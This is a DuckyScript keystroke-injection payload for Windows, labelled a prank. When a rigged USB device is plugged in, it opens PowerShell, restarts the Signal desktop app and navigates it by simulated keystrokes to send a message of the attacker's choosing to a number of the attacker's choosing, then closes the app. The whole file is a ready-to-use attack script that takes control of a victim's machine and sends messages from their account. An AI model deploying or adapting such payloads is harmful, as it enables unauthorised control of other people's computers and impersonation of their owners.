* #########################################
* #                                       |
* # Title        : Send Signal Messages   |
* # Author       : Aleff                  |
* # Version      : 1.0                    |
* # Category     : Prank, Execution       |
* # Target       : Windows 10-11          |
* #                                       |
* #########################################


* Requirements:
*   - Internet Connection
*   - Signal App installed
* Payload Plug-And-Play but can be edited as you want the message


DELAY 1000
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 500
STRING Stop-Process -Name "Signal"
ENTER
STRING Start-Process $Env:USERPROFILE\AppData\Local\Programs\signal-desktop\Signal.exe; exit
ENTER
DELAY 5000
TAB
TAB
TAB
ENTER
DELAY 100
* REQUIRED - Receiver number
STRING NUMBER
DELAY 100
TAB
DELAY 100
ENTER
DELAY 200

* This is the message that will be sent.
* You can change it as you want, if you want.
STRING YOUR_MESSAGE
ENTER

* Closing Signal App
DELAY 500
ALT F4
